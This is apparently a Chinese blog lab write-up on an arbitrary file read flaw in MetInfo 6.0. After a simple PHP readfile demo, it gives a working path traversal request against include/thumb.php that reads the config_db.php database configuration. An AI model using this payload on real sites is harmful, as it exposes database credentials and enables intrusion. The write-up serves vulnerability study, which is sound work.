metinfo6.0-任意文件读取

1.1任意文件读取

建立好网站后

1.任意文件读取

从code新建php文件到www目录下
在这里插入图片描述
2.然后新建一个文件夹命名为1,在1文件夹下新建1.php文件
在这里插入图片描述
在这里插入图片描述
输入代码并保存

<?php
$fp = "../phpinfo.php"; (此处因为phpinfo。php在该目录的上级文件夹,所以输入。。/)
readfile($fp);
?>

打开网页,右键审查元素,成功读取到phpinfo文件

在这里插入图片描述

1.2meinfo_6.0.0_file-read

新建环境metino6.0环境

打开BP 输入 显示404

include.thumb.php //:include.thumb.php 是一个 PHP 文件,通常用于生成缩略图。该文件的主要功能是根据指定的参数生成并输出缩略图的图像数据。

在这里插入代码片
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/e40ea29d68e141a398774872aaf99d0c.png)
```
再试一下输点别的,读取一下别的敏感目录
?dir=.....///http/.....///config/config_db.php
还是无法读取。
![在这里插入图片描述](https://img-blog.csdnimg.cn/f1f4075cbb8a47d293ba7f06c525d9fe.png)
输入代码,成功读取
GET /Metinfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php HTTP/1.1
![在这里插入图片描述](https://img-blog.csdnimg.cn/b541784deecc472bb3efe18ab0b918f2.png)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值